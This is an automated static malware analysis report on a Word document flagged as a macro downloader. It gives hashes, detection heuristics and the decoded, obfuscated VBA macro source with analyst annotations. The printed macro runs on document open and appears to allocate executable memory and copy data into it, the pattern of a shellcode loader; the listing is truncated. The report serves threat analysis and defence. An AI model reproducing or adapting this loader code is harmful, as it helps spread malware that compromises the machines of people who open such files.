Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60149abf042392e3…

MALICIOUS

Office (OLE)

253.0 KB · Created: 2018-03-06 15:09:00 · Authoring application: Microsoft Office Word · First seen: 2018-09-04
MD5: f53e5b89deb58b2b6a9543ba8aaa4f69 SHA-1: fad2a9210764a89f9524a2d62de8f76b64d012b3 SHA-256: 60149abf042392e352795c4bb2d731a75332e4bceb0daf83164baa0dcfa0dcd3
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment

The critical ClamAV heuristic and the presence of VBA macros — specifically a Document_Open macro, which runs automatically when the document is opened — indicate malicious intent. The VBA macro code appears to be obfuscated (constant-folded arithmetic, dictionary-word identifiers, discarded calls) and, as the 'Doc.Downloader' classification suggests, is designed to download and execute a second-stage payload. The extracted URLs are standard XML namespace identifiers found in the document body and are not indicative of malicious activity.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL — label (channel that reached it)
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13645 bytes
SHA-256: c2e228e51e65b4d5ba4450fcb8c3e921dfb6e30bda4723f75bff9b8d2519807b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes as exported by olevba. VB_Name "ThisDocument" marks this
' as the document's own class module, which is where Word looks for the
' Document_Open auto-execute handler defined further down. No Option Explicit
' follows, so undeclared names in the procedures below are implicit Variants.
' Analyst notes on the decoded macro. Takes one untyped (Variant) argument
' `losing` and returns `caique`, the value written back by `abutting`.
' Many Dim'd locals (trainbearer, beamish, decadent, compiler, centuplicate,
' nonrestrictive, istic, window) are never referenced again, and several
' assignments are never read: filler typical of macro obfuscation. Helpers
' evagation, genre and abutting are not defined in this preview — their
' Declare statements (if any) are elsewhere in the extracted source.
Function miscreance(losing)
Dim trainbearer As Long
Dim beamish As Byte
Dim decadent As Long
Dim compiler As String
' Conditional compilation with constant arithmetic: the first comparison is
' 700 > -220 (always True) and the left operand of the second "<" is
' (28 - 28) * 2 = 0, so this branch reduces to "0 < Win64", i.e. it is taken
' when the Win64 compile-time constant is positive. It uses LongPtr and sets
' paillasse to 8; the #ElseIf branch uses Long and 4 — consistent with a
' pointer width in bytes (inferred, not verifiable from the preview alone).
#If (57 - 111 + 454 + 46 - 62 + 316) > ((4 - 125 + 441) - (90 - 126 + 576) * 1) And ((51 - 106 + 83) - (72 - 111 + 67)) * 2 < (Win64) Then
Dim centuplicate As String
Dim shingling As LongPtr
' 109 - 125 + 24 = 8
paillasse = 109 - 125 + 24
Dim caique As LongPtr
Dim nonrestrictive As String
Dim istic As Variant
Dim birdseye As LongPtr
Dim window As String
' VarPtr yields the address of shingling. The call shape
' (destination address, VarPtr(losing) + 8, byte count) resembles a
' memory-copy helper; offset 8 into a Variant is the start of its data
' payload. NOTE(review): evagation is opaque here — confirm from its Declare.
advertising = VarPtr(shingling)
Commit = evagation(advertising, VarPtr(losing) + (114 - 58 - 48), paillasse)
' Complement of the branch above: comparison binds tighter than Not, so
' "Not 0 < Win64" is Not (0 < Win64). 32-bit path: Long, paillasse = 4.
#ElseIf (48 - 87 + 439 + 71 - 29 + 258) > ((99 - 102 + 323) - (78 - 75 + 537) * 1) And Not ((40 - 80 + 68) - (70 - 45 + 3)) * 2 < (Win64) Then
Dim shingling As Long
' 104 - 127 + 27 = 4
paillasse = 104 - 127 + 27
Dim caique As Long
Dim birdseye As Long
#End If
' Runs on both branches: same argument shape as the evagation call, via
' genre (also not in the preview); 24 - 125 + 109 is again 8.
advertising = VarPtr(shingling)
Commit = genre(advertising, VarPtr(losing) + (24 - 125 + 109), paillasse)
' Constant folding of the next six assignments: maidenly = -1, caique = 0,
' offuscate = 0, birdseye = 9918, arrack = 4096 (&H1000), quadfiform = 64 (&H40).
maidenly = 5 - 121 + 115
caique = 100 - 113 + 13
offuscate = 16 - 67 + 51
birdseye = 114 - 128 + 9932
arrack = 14 - 98 + 4180
quadfiform = 1 - 108 + 171
' caique and birdseye are passed ByRef (the rest ByVal), so the callee can
' write back into them; the shape (-1, ByRef base, 0, ByRef size, &H1000,
' &H40) is consistent with a virtual-memory allocation API whose resulting
' address lands in caique. NOTE(review): abutting is opaque here — confirm
' against its Declare statement before relying on this reading.
transitorily = abutting(ByVal maidenly, _
caique, ByVal offuscate, birdseye, ByVal arrack, _
ByVal quadfiform)
' Assigned, never read: filler.
bathe = "tripalmitin"

' dirtily is never assigned (Empty), so this is 0 And 423 = 0; result unused.
prosalprosy = dirtily And 423

' genre again with (caique, shingling, 5883). If caique now holds the address
' written back by abutting and shingling the value read from losing's payload,
' this would copy 5883 bytes of losing's data into that region — hedged,
' since genre's semantics are not visible in this preview.
exchanger = genre(caique, shingling, 82 - 78 + 5879)
' gath = 69. Pmt is VBA's built-in loan-payment function; called as a
' statement its result is discarded — computational filler. The same idiom
' recurs in Document_Open and reservedly below.
gath = 17 + 52
 Pmt 0, gath, 3616, 33767, 4

' Return value: the address written back by abutting.
miscreance = caique
End Function
' Auto-execute handler: Word runs Document_Open when the document is opened
' with macros enabled (the OLE_VBA_DOCOPEN finding in the report above).
' The only meaningful statement is the call to reservedly; the rest is filler.
Private Sub Document_Open()
Dim doublebogey As Byte
Dim discretional As String
' crucifer and tavern are not defined in this preview; both results unused.
recordbreaking = crucifer
bedeck = tavern
' Calls Sub reservedly (defined below), which in turn calls miscreance.
reservedly
' mellifluous = 45; Pmt result discarded (filler, as in miscreance).
mellifluous = 11 + 34
 Pmt 0, mellifluous, 16970, 47194, 2
End Sub
Sub reservedly()
Dim miscegenate As String
Dim guiltridden As Variant
activeness.unscoured.Value = Day(#12/5/2013#)
varday = morocco = "ho"
binge = "moniliales"
deconstructionist = "egurgitate"
su = "cacodemon"
dewey = "harping"

bushranger = symbolize
alpestrine = cocozelle
aphorism = "blebby"
Set drunk = activeness.unscoured.SelectedItem
dartre = 36 + 42
 Pmt 0, dartre, 4082, 44229, 2

militat = drunk.Name
precipitously = 113 - 23 + 7754
ambassadorial = Right(militat, precipitously)
down = shrilly(ambassadorial)
stillroom = 6 + 29
 Pmt 0, stillroom, 26422, 14419, 7

marathon = "containerized"
#If (12 - 37 + 425 + 109 - 27 + 218) > ((17 - 46 + 349) - (120 - 42 + 462) * 1) And ((95 - 70 + 3) - (8 - 13 + 33)) * 2 < (Win64) Then
Dim celllike As Long
Dim delire As LongPtr
Dim homobasidiomycetes As LongPtr
Dim lifeless As Variant
#ElseIf (100 - 115 + 415 + 124 - 104 + 280) > ((29 - 33 + 324) - (75 - 92 + 557) * 1) And Not ((114 - 112 + 26) - (58 - 28 - 2)) * 2 < (Win64) Then
Dim godmother As Variant
Dim homobasidiomycetes As Long
Dim dimsightedness As Variant
Dim delire As Long
#End If
ceratozamia = 46 - 45 - 1
dispense = misbelieve
foundering = 3 - 31 + 4124
praises = 27 + 19
 Pmt 0, praises, 2397, 20766, 5

battledore = "cafeteria"
tulu = "sociolinguistics"
passive = 34 + 41
 Pmt 0, passive, 33175, 52385, 3

joyless = down
benzoin = strix
delire = miscreance(joyless)
matross = scherzo
#If (102 - 42 + 340 + 40 - 1 + 261) > ((122 - 23 + 221) - (116 - 14 + 438) * 1) And ((49 - 8 - 13) - (29 - 94 + 93)) * 2 < (Win64) Then
Dim anaphor As String
Dim grounded As LongPtr
Dim worrying As LongPtr
Dim gracious As LongPtr
ameer = 51 - 112 + 2125
#ElseIf (126 - 31 + 305 + 46 - 20 + 274) > ((59 - 62 + 323) - (72 - 32 + 500) * 1) And Not ((33 - 19 + 14) - (117 - 11 - 78)) * 2 < (Win64) Then
Dim grounded As Long
omophagia = 111 - 75 + 745
Dim worrying As Long
Dim gracious As Long
ameer = omophagia + 3459

#End If
Dim medieval As Byte
Dim opinon As Integer
grounded = 112 - 101 - 11
homobasidiomycetes = delire + ameer
worrying = 45 - 47 + 201529
gracious = 39 - 89 + 3550
squirming = baptize(worrying, grounded, homoba
... (truncated)